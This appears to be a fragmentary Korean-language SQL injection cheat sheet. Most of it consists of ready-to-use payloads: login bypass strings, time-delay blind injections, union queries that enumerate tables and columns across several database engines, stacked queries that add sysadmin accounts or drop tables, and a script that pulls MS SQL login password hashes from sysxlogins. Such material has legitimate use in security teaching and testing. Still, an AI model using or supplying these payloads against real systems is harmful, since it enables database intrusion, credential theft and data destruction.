userID

Name

LastName

Login

Password

1

John

Smith

jsmith

hello

2

Adam

Taylor

adamt

qwerty

3

Daniel

Thompson

dthompson

dthompson

LastName

Smith

SELECT * FROM users WHERE login = 'victor' AND password = '123'

var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";

formusr = ' or 1=1 – –

formpwd = anything

SELECT * FROM users WHERE username = ' ' or 1=1 – – AND password = 'anything'

$sql = "SELECT * FROM clients WHERE account = $formacct  AND pin = $formpin";

$formacct = 1 or 1=1 #

$formpin = 1111

SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111

▪ 문자 : ' " ) # || + >

▪ SQL Query 명령을 공백(구분자)과 같이:

%09select (tab%09, carriage return%13, linefeed%10 and space%32 with and, or, update, insert, exec)

▪ 지연 쿼리:' waitfor delay '0:0:10'--

' group by columnnames having 1=1 - -

' union select 1,1,'text',1,1,1 - -

' union select 1,1, bigint,1,1,1 - -

' and 1 in (select 'text' ) - -

' and condition  and '1'='1

'; if condition  waitfor delay '0:0:5' --

'; union select if( condition , benchmark (100000, sha1('test')), 'false' ),1,1,1,1;

SELECT  * FROM table WHERE x = 'normalinput' group by x having 1=1 --

GROUP BY x HAVING x = y ORDER BY x

UPDATE users    SET password = 'new password'  WHERE login = logged.user
AND password = 'old password'

user  or current_user

session_user

system_user

' and 1 in (select user ) --

'; if user ='dbo' waitfor delay '0:0:5 '--

' union select if( user() like 'root@%', benchmark(50000,sha1('test')), 'false' );

sa, system, sys, dba, admin, root 등

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

▪ MS SQL

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename ')

sp_columns tablename (this stored procedure can be used instead)

▪ MySQL

show columns from tablename

▪ Oracle

SELECT * FROM all_tab_columns WHERE table_name='tablename '

▪ DB2

SELECT * FROM syscat.columns WHERE tabname= 'tablename '

▪ Postgres

SELECT attnum,attname from pg_class, pg_attribute WHERE relname= 'tablename '
AND pg_class.oid=attrelid AND attnum > 0

' union select 0, sysobjects.name + ': ' + syscolumns.name + ': ' + systypes.name, 1, 1, '1', 1, 1, 1, 1, 1  from sysobjects, syscolumns, systypes where sysobjects.xtype = 'U' AND sysobjects.id = syscolumns.id AND syscolumns.xtype = systypes.xtype --

' and 1 in (select min(name ) from  master.dbo.sysdatabases where name >'.' ) --

' and 1 in (select min(filename ) from master.dbo.sysdatabases where filename >'.' ) --

MySQL

MS SQL Server

Oracle

MS Access

mysql.user

mysql.host

mysql.db

sysobjects

syscolumns

systypes

sysdatabases

SYS.USER_OBJECTS

SYS.TAB

SYS.USER_TEBLES

SYS.USER_VIEWS

SYS.ALL_TABLES

SYS.USER_TAB_COLUMNS

SYS.USER_CATALOG

MsysACEs

MsysObjects

MsysQueries

MsysRelationships

'; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' '

 from users where login>@var select @var as var into temp end --

' or 1 in (select var from temp) --

' ; drop table temp --

▪ MS SQL

exec sp_addlogin ' victor ', 'Pass123'

exec sp_addsrvrolemember 'victor', 'sysadmin'

▪ MySQL

INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD(' Pass123'))

▪ Access

CREATE USER victor IDENTIFIED BY ' Pass123'

▪ Postgres (requires UNIX account)

CREATE USER victor WITH PASSWORD ' Pass123'

▪ Oracle

CREATE USER victor IDENTIFIED BY Pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;

GRANT CONNECT TO victor;

GRANT RESOURCE TO victor;

SELECT name, password FROM master..sysxlogins

SELECT password FROM master..sysxlogins

begin @charvalue='0x', @i=1, @length=datalength(@binvalue),

@hexstring = '0123456789ABCDEF'

while (@i<=@length) BEGIN

declare @tempint int, @firstint int, @secondint int

select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i,1))
select @firstint=FLOOR(@tempint/16) 
select @secondint=@tempint - (@firstint*16)
select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) +

SUBSTRING (@hexstring, @secondint+1, 1) 

select @i=@i+1  END

'; begin declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring char(16) set @var=':' select @xdate1=(select min(xdate1) from master.dbo.sysxlogins where password is not null) begin while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where xdate1=@xdate1), @charvalue = '0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) begin  declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int, SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16)  select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1)  select @i=@i+1  end select @var=@var+' | '+name+'/'+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1 and password is not null) end select @var as x into temp end end –

▪ ' and 1 in (select x from temp) --

▪ ' and 1 in (select substring (x, 256, 256) from temp) --

▪ ' and 1 in (select substring (x, 512, 256) from temp) --

▪ ' drop table temp --